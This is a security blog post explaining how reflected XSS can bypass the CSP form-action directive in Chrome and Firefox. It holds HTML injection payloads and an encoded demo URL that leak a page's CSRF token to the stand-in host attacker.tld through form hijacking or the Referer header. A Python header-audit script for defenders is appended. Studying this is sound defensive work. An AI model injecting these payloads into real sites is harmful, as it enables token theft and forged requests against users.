
Using reflected XSS with form-action to bypass CSP

Date: 2016-12-05 15:53 Source: unknown Author: SecYe Security

CSP (Content-Security-Policy) is an HTTP response header made up of directives that tell the browser how to restrict the content of a page. The form-action directive, for example, restricts the URLs to which forms on the page may be submitted. This protection can be bypassed through XSS / HTML injection vulnerabilities.

The form-action directive

To understand why the “form-action” directive is important from a security perspective, imagine this scenario:

Content-Security-Policy: default-src 'none';

<html><body>
<div>[Reflected XSS vulnerability here]</div>
<form method="POST" id="subscribe" action="/api/v1/newsletter/subscribe">
<input type="hidden" name="csrftoken" value="5f4dcc3b5aa765d61d8327deb882cf99" />
<input type="submit" value="Subscribe to newsletter" />
</form>
</body></html>

Since the CSP doesn’t allow scripts, we can’t use scripts to extract the CSRF token. However, by injecting a <form> tag we can override where the form (including the CSRF token) will be submitted:

Content-Security-Policy: default-src 'none';

<html><body>
<div><form action="http://attacker.tld"></div>
<form method="POST" id="subscribe" action="/api/v1/newsletter/subscribe">
<input type="hidden" name="csrftoken" value="5f4dcc3b5aa765d61d8327deb882cf99" />
<input type="submit" value="Subscribe to newsletter" />
</form>
</body></html>

Bypass in Chrome

The directive can be bypassed by overriding the method of an existing form (using the formmethod attribute) to “GET” and the action (using the formaction attribute) to “” (current page). We then combine this with a referrer leaking element such as <link rel='subresource' href='http://attacker.tld/link-subresource'>.

Content-Security-Policy: default-src 'none';

<html><body>
<div>
<input value="CLICK ME FOR POC" type="submit" formaction="" form="subscribe" formmethod="get" />
<input type="hidden" name="xss" form="subscribe" value="<link rel='subresource' href='http://attacker.tld/link-subresource'>" />
</div>
<form method="POST" id="subscribe" action="/api/v1/newsletter/subscribe">
<input type="hidden" name="csrftoken" value="5f4dcc3b5aa765d61d8327deb882cf99" />
<input type="submit" value="Subscribe to newsletter" />
</form>
</body></html>

When the victim then clicks our injected submit button, the browser will send the form values to the current page as GET parameters. These GET parameters are then leaked to attacker.tld because of the referrer leaking element. In other words, the form values (including the CSRF token) will be sent to http://attacker.tld through the Referer header. form-action bypassed!

Demo:

http://bugbounty.se/csp_bypass.php?xss=%3Cinput%20value=%22CLICK%20ME%20FOR%20POC%22%20type=%22submit%22%20formaction=%22%22%20form=%22subscribe%22%20formmethod=%22get%22%20/%3E%3Cinput%20type=%22hidden%22%20name=%22xss%22%20form=%22subscribe%22%20value=%22%3Clink%20rel=%27subresource%27%20href=%27http://attacker.tld/link-subresource%27%3E%22/%3E

Aftermath: [image: CSP]

Bypassing in Firefox

The attack for Firefox is essentially the same, but instead of using <link rel='subresource' href='http://attacker.tld'> we use <a href='http://attacker.tld'>, the downside being that the user has to click twice as opposed to once.
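As an added defender-side check (not part of the original post), here is a small Python audit of the two response headers that decide whether the bypass above works: Content-Security-Policy (form-action has no fallback to default-src, and 'self' still admits formaction="") and Referrer-Policy (which decides whether the query string of the current page reaches attacker.tld in the Referer of the injected subresource or link). It assumes headers are supplied as a dict of header names to values; host-source matching against the page origin is deliberately left out.

```python
from typing import Dict, List

# Referrer-Policy values that send at most the origin on cross-origin requests,
# so a CSRF token in the current page's query string never reaches attacker.tld.
SAFE_REFERRER_POLICIES = {
    "no-referrer", "same-origin", "origin", "strict-origin",
    "origin-when-cross-origin", "strict-origin-when-cross-origin",
}


def parse_csp(header: str) -> Dict[str, List[str]]:
    """Split a Content-Security-Policy value into {directive: [source expressions]}."""
    policy: Dict[str, List[str]] = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def audit_headers(headers: Dict[str, str]) -> List[str]:
    """Return finding ids for the form-action / Referer leak conditions (hypothetical helper)."""
    h = {k.lower(): v for k, v in headers.items()}
    findings: List[str] = []

    # A Referrer-Policy header may list several policies; browsers use the last one
    # they recognise. An absent header is treated as leaking, since the older browser
    # defaults (and no-referrer-when-downgrade / unsafe-url) send the full URL.
    referrer_policy = h.get("referrer-policy", "").split(",")[-1].strip().lower()
    referrer_leaks = referrer_policy not in SAFE_REFERRER_POLICIES

    form_action = parse_csp(h.get("content-security-policy", "")).get("form-action")
    if form_action is None:
        # form-action does not fall back to default-src: with only default-src 'none',
        # an injected <form action="http://attacker.tld"> still submits there.
        findings.append("form-action-missing")
    elif ("'self'" in form_action or "*" in form_action) and referrer_leaks:
        # 'self' admits formaction="" + formmethod="get", which puts every field of
        # the hijacked form (csrftoken included) into the page URL, and the referrer
        # policy then lets that URL travel cross-origin in the Referer header.
        findings.append("form-action-bypassable-via-referer")

    if referrer_leaks:
        findings.append("referrer-leaks-query-string")
    return findings


if __name__ == "__main__":
    # Constructed sample header sets: the post's policy, and a hardened variant.
    print(audit_headers({"Content-Security-Policy": "default-src 'none'"}))
    print(audit_headers({"Content-Security-Policy": "default-src 'none'; form-action 'self'",
                         "Referrer-Policy": "no-referrer"}))
```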

Source: SecYe Security [http://www.secye.com] (Editor: SecYe Security)
